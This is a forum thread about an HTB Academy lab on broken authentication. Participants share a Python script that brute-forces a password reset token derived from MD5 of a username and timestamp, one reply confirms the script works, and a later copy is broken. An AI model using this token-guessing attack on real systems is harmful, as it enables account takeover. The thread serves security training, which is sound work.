BROKEN AUTHENTICATION module | HTB Academy

Hi, I am on the skills assessment and am quite stuck from the start… I am attempting to brute force support login, with a 30 sec dely between each req to prevent the lockout and trying to decode the cookie but I am stuck on that as well. any hints? happy to talk over dm’s or discord. Thanks!

I have about the same with you. really not sure what’s wrong with it.

Did you find the solution to this problem?

I’m having issues with the first question. Here’s what I’m doing. Below is the script that I’m using, and I’m inputting the epoch time, which I converted using this website: https://currentmillis.com/. I’m converting the time in the response, after creating the reset token for htbuser, “And has been created at ”. I’m not getting anywhere with this, and it’s driving me crazy!

from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = "http://138.68.162.164:30826/question1/"

header= {"Origin": "http://138.68.162.164:32716","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" , "Content-Type": "application/x-www-form-urlencoded", "Referer":"http://138.68.162.164:32716/question1/"}

proxy_server = {
   'http': 'http://127.0.0.1:8080'}
   
now = int(1665242225000)
start_time = now
fail_text = "Wrong token"
user="htbadmin"
endtime=now+1500

for x in range(start_time-1500, endtime):
    raw_data = user+str(x)
    md5_token = md5(str(raw_data).encode()).hexdigest()
    data ={"token":md5_token,"submit":"check"}

    print("checking {} {}".format(str(x), md5_token))

    res = requests.post(url, data=data,headers=header, proxies=proxy_server)

    if not fail_text in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()


exit()

Hey @RedDawn!

Good news is, your script works absolutely great. I just tested it, however, I removed the header and proxy from the post request.

I think your issue is in the epoch generation. Be very mindful of AM/PM when calculating it. I like this website: Epoch Converter - Unix Timestamp Converter

-onthesauce

Awesome, thank you! That site worked great

1 Like

Can you help me?

from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = “http://161.35.162.182:30168/question1/

now = int(1669172672000)
start_time = now
fail_text = “Wrong token”
user=“htbadmin”
endtime=now+1500

for x in range(start_time+1500, endtime):
raw_data = user+str(x)
md5_token = md5(str(raw_data).encode()).hexdigest()
data ={“token”:md5_token,“submit”:“check”}

print(“checking {} {}”.format(str(x), md5_token))

res = requests.post(url, data=data,headers=header)

if not fail_text in res.text:
print(res.text)
print(“[*] Congratulations! raw reply printed before”)
exit()

exit()

i get invalid token